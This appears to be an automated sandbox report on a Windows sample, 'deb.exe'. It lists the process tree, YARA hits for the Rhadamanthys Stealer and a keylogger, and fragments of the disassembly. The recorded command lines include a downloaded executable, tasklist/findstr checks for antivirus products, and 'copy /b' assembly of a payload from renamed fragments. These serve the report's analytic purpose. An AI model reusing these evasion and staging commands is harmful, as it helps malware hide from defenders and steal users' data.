                                                      2024-12-19 08:29:15 UTC16384INData Raw: 42 53 6b 43 78 6c 72 73 34 31 41 44 66 7a 33 6d 78 42 4a 75 6b 34 34 4a 51 2f 4a 33 69 59 71 68 2b 4f 65 70 4c 4e 64 51 71 31 51 73 7a 67 79 74 53 33 47 38 4c 71 73 6f 44 63 4f 78 42 42 5a 52 63 30 67 50 62 44 33 47 68 41 48 6f 49 67 50 70 4a 78 4c 36 76 4c 67 7a 6f 57 75 73 68 50 4b 6e 6e 71 4f 4d 6a 4f 33 33 7a 45 71 6c 4b 77 4c 41 6c 61 51 5a 75 62 75 35 35 2f 57 6f 50 65 2f 59 79 4d 6b 79 69 6c 69 72 6e 43 42 4b 2b 35 63 44 59 47 71 75 79 32 7a 37 41 38 6a 62 6c 44 4c 7a 73 54 2b 49 6e 70 70 42 4a 61 62 50 5a 68 67 54 4a 32 51 64 6c 4d 31 67 66 6b 64 4f 6d 72 66 41 73 4e 58 61 6f 79 6e 52 2b 61 6e 6d 47 33 38 51 31 68 77 4d 5a 5a 7a 42 4b 6c 66 4d 62 6d 5a 43 64 66 41 53 38 35 70 30 53 6f 6b 48 6d 73 33 62 6f 74 47 63 71 71 6e 36 38 68 74 51 6b 74 42
                                                      Data Ascii: BSkCxlrs41ADfz3mxBJuk44JQ/J3iYqh+OepLNdQq1QszgytS3G8LqsoDcOxBBZRc0gPbD3GhAHoIgPpJxL6vLgzoWushPKnnqOMjO33zEqlKwLAlaQZubu55/WoPe/YyMkyilirnCBK+5cDYGquy2z7A8jblDLzsT+InppBJabPZhgTJ2QdlM1gfkdOmrfAsNXaoynR+anmG38Q1hwMZZzBKlfMbmZCdfAS85p0SokHms3botGcqqn68htQktB


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:03:29:10
                                                      Start date:19/12/2024
                                                      Path:C:\Users\user\Desktop\deb.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Users\user\Desktop\deb.exe"
                                                      Imagebase:0x7ff702020000
                                                      File size:2'844'594 bytes
                                                      MD5 hash:176033D9407C87DB1083366F6CC0667D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:03:29:10
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:4
                                                      Start time:03:29:17
                                                      Start date:19/12/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\downloaded_exe.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Local\Temp\downloaded_exe.exe"
                                                      Imagebase:0x400000
                                                      File size:1'301'562 bytes
                                                      MD5 hash:22AEFDCE6474D0687748AB51F3DDE0D9
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 25%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:03:29:19
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy Estimates Estimates.cmd & Estimates.cmd
                                                      Imagebase:0x1c0000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:6
                                                      Start time:03:29:19
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff66e660000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:03:29:21
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:tasklist
                                                      Imagebase:0x8b0000
                                                      File size:79'360 bytes
                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:03:29:21
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:findstr /I "opssvc wrsa"
                                                      Imagebase:0xfc0000
                                                      File size:29'696 bytes
                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:9
                                                      Start time:03:29:21
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:tasklist
                                                      Imagebase:0x8b0000
                                                      File size:79'360 bytes
                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:10
                                                      Start time:03:29:21
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                      Imagebase:0xfc0000
                                                      File size:29'696 bytes
                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:03:29:22
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:cmd /c md 542181
                                                      Imagebase:0x1c0000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:12
                                                      Start time:03:29:22
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:findstr /V "exports" Fleece
                                                      Imagebase:0xfc0000
                                                      File size:29'696 bytes
                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:13
                                                      Start time:03:29:22
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:cmd /c copy /b ..\Stewart + ..\Universe + ..\Ferry + ..\Namely + ..\Catholic + ..\Understanding + ..\Invalid + ..\Del + ..\Premier b
                                                      Imagebase:0x1c0000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:03:29:22
                                                      Start date:19/12/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\542181\Flux.com
                                                      Wow64 process (32bit):true
                                                      Commandline:Flux.com b
                                                      Imagebase:0x890000
                                                      File size:947'288 bytes
                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 0%, ReversingLabs
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:03:29:22
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:choice /d y /t 5
                                                      Imagebase:0x4d0000
                                                      File size:28'160 bytes
                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:18
                                                      Start time:03:29:45
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\svchost.exe"
                                                      Imagebase:0x8c0000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000012.00000003.2542694593.00000000029C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000003.2546815827.0000000005060000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000012.00000002.2631620318.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000003.2546587456.0000000004E40000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:03:29:46
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1916 -s 972
                                                      Imagebase:0xd0000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:22
                                                      Start time:03:29:54
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\System32\fontdrvhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\fontdrvhost.exe"
                                                      Imagebase:0x7ff7d9200000
                                                      File size:827'408 bytes
                                                      MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      General

                                                      Target ID:24
                                                      Start time:03:29:57
                                                      Start date:19/12/2024
                                                      Path:C:\Windows\System32\WerFault.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\WerFault.exe -u -p 4196 -s 136
                                                      Imagebase:0x7ff63cab0000
                                                      File size:570'736 bytes
                                                      MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:0.9%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:19.4%
                                                        Total number of Nodes:324
                                                        Total number of Limit Nodes:16
                                                        execution_graph 61697 7ff7020d6fb0 61698 7ff7020d6fcd 61697->61698 61699 7ff7020d6fd6 61698->61699 61700 7ff7020d7000 61698->61700 61701 7ff7020d6fec 61699->61701 61703 7ff7020d6fe4 memcpy 61699->61703 61704 7ff7020d71b0 61700->61704 61703->61701 61705 7ff7020d720b 61704->61705 61718 7ff7020d7130 61705->61718 61708 7ff7020d723c 61709 7ff7020d7260 61708->61709 61712 7ff7020d7255 memcpy 61708->61712 61711 7ff7020d7280 61709->61711 61713 7ff7020d7275 memcpy 61709->61713 61710 7ff7020d7231 memcpy 61710->61708 61714 7ff7020d72fb 61711->61714 61715 7ff7020d72aa 61711->61715 61712->61709 61713->61711 61722 7ff70202fdd0 GetCurrentProcess TerminateProcess _lseeki64 61714->61722 61715->61701 61719 7ff7020d7146 61718->61719 61723 7ff7020ea130 61719->61723 61721 7ff7020d7197 61721->61708 61721->61710 61740 7ff7020e95e0 30 API calls 61723->61740 61725 7ff7020ea143 61741 7ff7020b0100 38 API calls 61725->61741 61727 7ff7020ea151 61742 7ff7020e9c60 30 API calls 61727->61742 61740->61725 61741->61727 61743 7ff702021410 61746 7ff7020211b0 61743->61746 61745 7ff702021426 61747 7ff7020211e0 61746->61747 61748 7ff7020211e9 Sleep 61747->61748 61752 7ff7020211f9 61747->61752 61748->61747 61749 7ff7020213df _amsg_exit 61750 7ff7020211b0 179 API calls 61749->61750 61751 7ff702021406 61750->61751 61751->61745 61752->61749 61753 7ff7020212e5 61752->61753 61754 7ff702021243 61752->61754 61757 7ff70202132d 61752->61757 61765 7ff7020218c9 61753->61765 61781 7ff70202e520 9 API calls 61754->61781 61756 7ff702021254 SetUnhandledExceptionFilter 61758 7ff702021277 61756->61758 61757->61745 61759 7ff70202127c malloc 61758->61759 61759->61753 61760 7ff7020212a6 61759->61760 61762 7ff7020212b0 strlen malloc memcpy 61760->61762 61762->61762 61764 7ff7020212e2 61762->61764 61763 7ff702021319 61763->61749 61763->61757 61764->61753 61766 7ff7020218df 61765->61766 61782 7ff7020d7870 61766->61782 61768 7ff702021903 61788 7ff702021460 61768->61788 61770 7ff702021920 61779 7ff702021930 61770->61779 61801 7ff7020216c5 61770->61801 61772 7ff70202194a 61773 7ff7020d7870 38 API calls 61772->61773 61772->61779 61774 7ff702021993 61773->61774 61805 7ff7020e74b0 61774->61805 61776 7ff7020219aa 61808 7ff7020217ff 61776->61808 61778 7ff7020219d3 61778->61779 61780 7ff7020219ed ShellExecuteA 61778->61780 61779->61763 61780->61779 61781->61756 61783 7ff7020d7898 61782->61783 61784 7ff7020d78c0 61783->61784 61821 7ff7020ea040 38 API calls 61783->61821 61817 7ff7020d4b20 61784->61817 61787 7ff7020d78f1 61787->61768 61822 7ff70202f140 61788->61822 61790 7ff70202146c InternetOpenA 61791 7ff7020214c2 61790->61791 61792 7ff702021506 61790->61792 61793 7ff7020d7870 38 API calls 61791->61793 61794 7ff702021515 InternetOpenUrlA 61792->61794 61800 7ff7020214f2 61793->61800 61795 7ff702021559 61794->61795 61798 7ff7020215b0 61794->61798 61797 7ff7020d7870 38 API calls 61795->61797 61796 7ff7020215d8 InternetReadFile 61796->61798 61797->61800 61798->61796 61798->61800 61824 7ff7020d7fc0 strlen 61798->61824 61800->61770 61802 7ff7020216ec 61801->61802 61834 7ff7020d3620 61802->61834 61804 7ff702021754 61804->61772 61872 7ff7020d5b90 strlen 61805->61872 61807 7ff7020e74d4 61807->61776 61897 7ff7020c6420 61808->61897 61810 7ff70202184a 61930 7ff7020c6b10 61810->61930 61812 7ff702021837 61812->61810 61913 7ff7020a73d0 61812->61913 61813 7ff7020218a1 61813->61778 61818 7ff7020d4b6f 61817->61818 61820 7ff7020d4b85 61817->61820 61819 7ff7020d7130 38 API calls 61818->61819 61819->61820 61820->61787 61823 7ff70202f14f 61822->61823 61823->61790 61823->61823 61825 7ff7020d7fea 61824->61825 61826 7ff7020ea130 38 API calls 61825->61826 61827 7ff7020d8007 61826->61827 61828 7ff7020ea130 38 API calls 61827->61828 61829 7ff7020d8043 61828->61829 61830 7ff7020ea130 38 API calls 61829->61830 61831 7ff7020d8086 61830->61831 61832 7ff7020d80ba 61831->61832 61833 7ff7020d71b0 41 API calls 61831->61833 61832->61796 61833->61832 61839 7ff7020d3530 61834->61839 61838 7ff7020d365d 61838->61804 61840 7ff7020d3569 61839->61840 61841 7ff7020d3590 61840->61841 61842 7ff7020ea130 38 API calls 61840->61842 61843 7ff7020aef40 61841->61843 61842->61841 61844 7ff7020aef67 61843->61844 61847 7ff7020aeea0 61844->61847 61850 7ff7020aed70 61847->61850 61851 7ff7020aedad 61850->61851 61852 7ff7020aed87 61850->61852 61851->61838 61854 7ff7020c8b80 61852->61854 61855 7ff7020c8bbe 61854->61855 61856 7ff7020c8bb9 61854->61856 61860 7ff7020e94e0 61855->61860 61869 7ff7020e9f40 30 API calls 61856->61869 61861 7ff7020e94f4 malloc 61860->61861 61862 7ff7020c8bca 61861->61862 61863 7ff7020e9507 61861->61863 61862->61851 61863->61861 61864 7ff7020e9515 61863->61864 61870 7ff7020e95e0 30 API calls 61864->61870 61866 7ff7020e951f 61871 7ff7020e9c60 30 API calls 61866->61871 61870->61866 61873 7ff7020d5bcb 61872->61873 61876 7ff7020d5bba 61872->61876 61874 7ff7020ea130 38 API calls 61873->61874 61875 7ff7020d5bd7 61874->61875 61875->61876 61877 7ff7020ea130 38 API calls 61875->61877 61878 7ff7020d6fd6 61876->61878 61879 7ff7020d7000 61876->61879 61882 7ff7020d5c0c 61877->61882 61880 7ff7020d6fec 61878->61880 61883 7ff7020d6fe4 memcpy 61878->61883 61881 7ff7020d71b0 41 API calls 61879->61881 61880->61807 61881->61880 61882->61876 61884 7ff7020ea130 38 API calls 61882->61884 61883->61880 61885 7ff7020d5c43 61884->61885 61886 7ff7020d5c70 61885->61886 61895 7ff7020ea1d0 40 API calls 61885->61895 61886->61876 61888 7ff7020ea130 38 API calls 61886->61888 61889 7ff7020d5cb4 61888->61889 61889->61876 61890 7ff7020d5cea 61889->61890 61891 7ff7020ea130 38 API calls 61890->61891 61892 7ff7020d5cf6 61891->61892 61896 7ff7020d5100 43 API calls 61892->61896 61894 7ff7020d5d1c 61894->61807 61896->61894 61898 7ff7020c644b 61897->61898 61935 7ff7020e1400 61898->61935 61900 7ff7020c6489 61938 7ff7020b8030 61900->61938 61902 7ff7020c64aa 61903 7ff7020e1400 145 API calls 61902->61903 61904 7ff7020c64b5 61903->61904 61941 7ff7020b65f0 61904->61941 61907 7ff7020c64f0 61954 7ff7020e15d0 49 API calls 61907->61954 61908 7ff7020c64d7 61953 7ff7020e15d0 49 API calls 61908->61953 61911 7ff7020c64de 61911->61812 61912 7ff7020c64fb 61912->61812 62159 7ff7020a7540 61913->62159 61915 7ff702021884 61927 7ff7020c6050 61915->61927 61922 7ff7020a742a 61922->61915 61925 7ff7020a74dd 61922->61925 62164 7ff7020e15d0 49 API calls 61922->62164 61925->61922 62165 7ff70202fdd0 GetCurrentProcess TerminateProcess _lseeki64 61925->62165 62166 7ff7020a7640 49 API calls 61925->62166 62167 7ff70202f530 RtlCaptureContext RtlUnwindEx abort 61925->62167 62168 7ff7020e9650 30 API calls 61925->62168 62169 7ff7020e12b0 30 API calls 61925->62169 62170 7ff7020e9840 30 API calls 61925->62170 61928 7ff7020b6a50 52 API calls 61927->61928 61929 7ff7020c6061 61928->61929 61929->61810 61931 7ff7020b6a50 52 API calls 61930->61931 61932 7ff7020c6b4b 61931->61932 62172 7ff7020af550 fclose 61932->62172 61934 7ff7020c6b54 61955 7ff7020dfd40 61935->61955 61937 7ff7020e1411 61937->61900 61939 7ff7020d3320 145 API calls 61938->61939 61940 7ff7020b807f 61939->61940 61940->61902 61944 7ff7020b661f 61941->61944 61942 7ff7020b66e8 62127 7ff70202fdd0 GetCurrentProcess TerminateProcess _lseeki64 61942->62127 61943 7ff7020b66dd 61943->61907 61943->61908 61944->61941 61944->61942 61944->61943 62104 7ff7020b6a50 61944->62104 61953->61911 61954->61912 61962 7ff7020d3320 61955->61962 61957 7ff7020dfd7b 61958 7ff7020dfda4 61957->61958 61959 7ff7020dfd9c 61957->61959 61984 7ff70202fdd0 GetCurrentProcess TerminateProcess _lseeki64 61958->61984 61959->61937 61985 7ff70203cc10 61962->61985 61964 7ff7020d3345 61968 7ff7020d335b 61964->61968 62047 7ff7020d1f40 95 API calls 61964->62047 61965 7ff7020d3393 61965->61957 61968->61965 62029 7ff7020409c0 120 API calls 61968->62029 61969 7ff7020d336b 62030 7ff70203b4d0 61969->62030 61972 7ff7020d33ce 62048 7ff7020413c0 30 API calls 61972->62048 61973 7ff7020d337a 62046 7ff70203b7a0 malloc free SetEvent GetCurrentThreadId 61973->62046 61976 7ff7020d33d3 61978 7ff7020d340d 61976->61978 61981 7ff7020d33dc 61976->61981 61977 7ff7020d338f 61977->61965 61977->61981 62051 7ff70202f530 RtlCaptureContext RtlUnwindEx abort 61978->62051 61981->61976 62049 7ff7020e95e0 30 API calls 61981->62049 62050 7ff7020e9c60 30 API calls 61981->62050 61986 7ff70203cc3d 61985->61986 61987 7ff70203cc75 61985->61987 61986->61987 62052 7ff70203bbe0 61986->62052 61988 7ff70203cd2d 61987->61988 61989 7ff70203cc86 61987->61989 61988->61987 62098 7ff70202fdd0 GetCurrentProcess TerminateProcess _lseeki64 61988->62098 61989->61964 61992 7ff70203cc47 61994 7ff70203b4d0 15 API calls 61992->61994 61993 7ff70203cd8a GetModuleHandleA 62002 7ff7020eaecb GetProcAddress GetProcAddress 61993->62002 62003 7ff7020eaef8 61993->62003 61995 7ff70203cc56 61994->61995 61996 7ff70203cc98 61995->61996 61997 7ff70203cc5c 61995->61997 62059 7ff70203c270 61996->62059 61999 7ff70203cd38 fprintf 61997->61999 62000 7ff70203cc65 61997->62000 62096 7ff70203b7a0 malloc free SetEvent GetCurrentThreadId 61999->62096 62092 7ff70203b7a0 malloc free SetEvent GetCurrentThreadId 62000->62092 62002->62003 62003->61964 62005 7ff70203ccae TlsGetValue 62008 7ff70203cda8 62005->62008 62009 7ff70203ccc6 62005->62009 62006 7ff70203cc6d 62093 7ff70203bed0 CloseHandle free free fprintf 62006->62093 62011 7ff70203c320 46 API calls 62008->62011 62009->61993 62013 7ff70203c270 25 API calls 62009->62013 62011->62009 62014 7ff70203ccda TlsGetValue 62013->62014 62017 7ff70203cceb 62014->62017 62018 7ff70203cd90 62014->62018 62015 7ff70203cd60 62097 7ff70203bed0 CloseHandle free free fprintf 62015->62097 62020 7ff70203c270 25 API calls 62017->62020 62021 7ff70203cd9e 62017->62021 62075 7ff70203c320 62018->62075 62022 7ff70203cd01 TlsGetValue 62020->62022 62021->61993 62023 7ff70203cd0e 62022->62023 62024 7ff70203cd80 62022->62024 62023->61993 62094 7ff70203b7a0 malloc free SetEvent GetCurrentThreadId 62023->62094 62025 7ff70203c320 46 API calls 62024->62025 62025->62023 62027 7ff70203cd25 62095 7ff70203bed0 CloseHandle free free fprintf 62027->62095 62029->61969 62031 7ff70203b520 62030->62031 62036 7ff70203b4e5 62030->62036 62102 7ff70203b460 malloc free 62031->62102 62033 7ff70203b4fe 62033->61972 62033->61973 62034 7ff70203b528 62034->62033 62034->62036 62035 7ff70203b4f7 62035->62033 62039 7ff70203b510 GetCurrentThreadId 62035->62039 62036->62033 62036->62035 62037 7ff70203b588 GetCurrentThreadId 62036->62037 62038 7ff70203b547 62036->62038 62037->62033 62037->62038 62040 7ff70203b5b8 CreateEventA 62038->62040 62041 7ff70203b54e 62038->62041 62039->62033 62042 7ff70203b5e9 GetLastError 62040->62042 62043 7ff70203b5d0 62040->62043 62041->62033 62041->62035 62103 7ff70203b260 8 API calls 62041->62103 62042->62033 62043->62041 62044 7ff70203b5de CloseHandle 62043->62044 62044->62041 62046->61977 62047->61968 62049->61981 62053 7ff70203bbf9 62052->62053 62054 7ff70203bc20 62053->62054 62055 7ff70203bc05 calloc 62053->62055 62057 7ff70203bc50 calloc 62054->62057 62058 7ff70203bc31 62054->62058 62055->62058 62057->62058 62058->61992 62060 7ff70203c310 62059->62060 62061 7ff70203c285 62059->62061 62060->62005 62062 7ff70203bbe0 2 API calls 62061->62062 62063 7ff70203c294 62062->62063 62064 7ff70203b4d0 15 API calls 62063->62064 62065 7ff70203c2a3 62064->62065 62066 7ff70203c2ad TlsAlloc 62065->62066 62072 7ff70203c2c2 62065->62072 62067 7ff7020eae66 abort 62066->62067 62066->62072 62068 7ff7020eae6c abort 62067->62068 62070 7ff7020eae85 GetModuleHandleA 62068->62070 62073 7ff7020eaecb GetProcAddress GetProcAddress 62070->62073 62074 7ff7020eaef8 62070->62074 62099 7ff70203b7a0 malloc free SetEvent GetCurrentThreadId 62072->62099 62073->62074 62074->62005 62100 7ff70203c000 21 API calls 62075->62100 62077 7ff70203c339 GetCurrentThreadId CreateEventA 62084 7ff70203c32d 62077->62084 62078 7ff70203c41c 62078->62017 62079 7ff70203c37a GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 62080 7ff70203c3de GetThreadPriority TlsSetValue 62079->62080 62081 7ff7020eae6c abort 62079->62081 62080->62078 62080->62081 62083 7ff7020eae85 GetModuleHandleA 62081->62083 62087 7ff7020eaecb GetProcAddress GetProcAddress 62083->62087 62088 7ff7020eaef8 62083->62088 62084->62077 62084->62078 62084->62079 62086 7ff70203c270 25 API calls 62084->62086 62101 7ff70203be40 GetCurrentThreadId OutputDebugStringA abort _vscprintf 62084->62101 62089 7ff70203c439 TlsGetValue 62086->62089 62087->62088 62088->62017 62090 7ff70203c44a 62089->62090 62091 7ff70203c450 62089->62091 62090->62017 62091->62075 62092->62006 62094->62027 62096->62015 62099->62072 62100->62084 62102->62034 62103->62041 62105 7ff7020b6a76 62104->62105 62106 7ff7020b6a8b 62105->62106 62128 7ff7020b6240 62105->62128 62108 7ff7020b6b26 62106->62108 62109 7ff7020b6af7 62106->62109 62112 7ff7020b6b47 62108->62112 62153 7ff70202fdd0 GetCurrentProcess TerminateProcess _lseeki64 62108->62153 62154 7ff7020e9840 30 API calls 62108->62154 62109->61944 62155 7ff70202f530 RtlCaptureContext RtlUnwindEx abort 62112->62155 62136 7ff7020b6279 62128->62136 62129 7ff7020b62ad 62130 7ff7020b6392 62129->62130 62131 7ff7020b62be 62129->62131 62132 7ff7020b6397 62129->62132 62157 7ff70202fdd0 GetCurrentProcess TerminateProcess _lseeki64 62130->62157 62131->62106 62158 7ff7020e9fc0 30 API calls 62132->62158 62136->62129 62156 7ff7020af250 _write _errno 62136->62156 62154->62108 62156->62136 62160 7ff7020a7403 62159->62160 62161 7ff7020a7569 62159->62161 62160->61922 62163 7ff7020e15d0 49 API calls 62160->62163 62161->62160 62171 7ff7020a6f10 49 API calls 62161->62171 62163->61922 62164->61922 62166->61925 62168->61925 62169->61925 62170->61925 62171->62160 62172->61934

                                                        Executed Functions

                                                        Function 00007FF7020211B0 Relevance: 10.6, APIs: 7, Instructions: 142sleepstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268499359.00007FF7020EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268538812.00007FF70211C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268560319.00007FF70211E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268581032.00007FF702121000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff702020000_deb.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandledmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 3806033187-0
                                                        • Opcode ID: 67f491df80b2563f6d7bed32c5a449999014d8738c14732d8cb884920c48780b
                                                        • Instruction ID: 9ec195d8aeb5bd709dd9f453bb2c73075cbfdd0de21b4651a062bf57d6438e58
                                                        • Opcode Fuzzy Hash: 67f491df80b2563f6d7bed32c5a449999014d8738c14732d8cb884920c48780b
                                                        • Instruction Fuzzy Hash: 8C515637A0974685EB10BF55ED80279EAA5AF84B80F844032DE0C87792DFBCE445C368
                                                        Function 00007FF702021460 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2268389362.00007FF702021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF702020000, based on PE: true
                                                        • Associated: 00000000.00000002.2268371716.00007FF702020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2268478141.00007FF7020EB000.00000004.00000001.01000000.00000003.sdmpDownload File
